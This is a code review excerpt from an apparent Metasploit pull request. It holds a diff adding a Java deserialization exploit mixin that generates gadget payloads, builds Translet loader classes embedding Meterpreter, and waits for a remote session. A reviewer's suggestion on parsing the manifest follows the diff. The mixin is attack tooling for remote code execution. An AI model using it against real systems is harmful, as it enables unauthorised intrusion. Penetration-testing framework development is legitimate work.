lib/msf/core/exploit/java/serialized.rb

```diff
@@ -0,0 +1,200 @@
+      unless vectors.empty?
+        vectors.each do |vector|
+          info vector.to_s
+        end
+        return Exploit::CheckCode::Appears
+      end
+      Exploit::CheckCode::Safe
+    end
+
+    def exploit
+      start_service
+
+      vectors = collect
+      vectors.each do |vector|
+        if session_created?
+          print_status 'Have a session, not trying further'
+          break
+        end
+        do_exploit(vector)
+      end
+
+      handler(nil)
+      unless vectors.empty?
+        begin
+          print_status 'Waiting for exploit to complete...'
+          Timeout.timeout(datastore['ListenerTimeout']) do
+            loop do
+              break if session_created?
+              Rex.sleep(0.25)
+            end
+
+            print_status 'Have session...'
+          end
+        rescue ::Timeout::Error
+          fail_with(Failure::Unknown, 'Timeout waiting for exploit to complete')
+        end
+      end
+
+      stop_service
+    end
+
+
+    class DatastoreRunConfig < Rex::Java::Serialization::Generator::GeneratorConfig
+      def initialize(props)
+        @props = props
+      end
+
+      def gadgets
+        @props['GADGETS']
+      end
+    end
+
+    def create_config(datastore)
+      DatastoreRunConfig.new(datastore)
+    end
+
+    def payloads(ctx, &block)
+      config = create_config(datastore)
+      p = create_params(ctx)
+      gadgets = Rex::Java::Serialization::Generator::BuiltinGadgets.new
+      matches = gadgets.find(ctx, params: p, rc: config)
+      if block
+        matches.each do |match|
+          yield match.create(ctx, params: p)
+        end
+      else
+        payloads = []
+        matches.each do |match|
+          payloads.push(match.create(ctx, params: p))
+        end
+        payloads
+      end
+    end
+
+    def loader_classes(jar, mainclass, xalan: false)
+      translet = 'metasploit/TransletPayload.class'
+      if xalan
+        translet = 'metasploit/TransletXalanPayload.class'
+      end
+
+      includes = [
+        'com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class',
+        'com/metasploit/meterpreter/MemoryBufferURLConnection.class',
+      ]
+      rand = (0...8).map { (65 + rand(26)).chr }.join
+      loadername = 'Translet' + rand
+      bytecode =  Rex::Java::Classfile::Templates.patch_loader(
+        MetasploitPayloads.read("java", translet), 
+        loadername, 
+        jar, 
+        mainclass:mainclass)
+      classes = [['metasploit/' + loadername, bytecode]]
+      includes.each do |include|
+        classes += [[include, MetasploitPayloads.read("java", include)]]
+      end
+      classes
+    end
+
+    def create_templates_jar_loader(payload, xalan: false)
+      jar = payload.encoded_jar
+      manifest = extract_file(jar, "META-INF/MANIFEST.MF")
+      mainclass = nil
+      manifest.split("\r\n").each do |line|
+        mainclass = line.split()[1] if line.downcase.start_with?("main-class: ")
+      end
```

Comment:
`each_line` should work, so long as you also use `line.strip` (due to trailing `\r`).

```ruby
      mainclass = nil
      manifest.each_line do |line|
        mainclass = line.strip.split()[1] if line.downcase.start_with?("main-class: ")
      end
```

Also, confirming: if more than one `"main-class: "` exists, you want to use the last one? (not the first one?)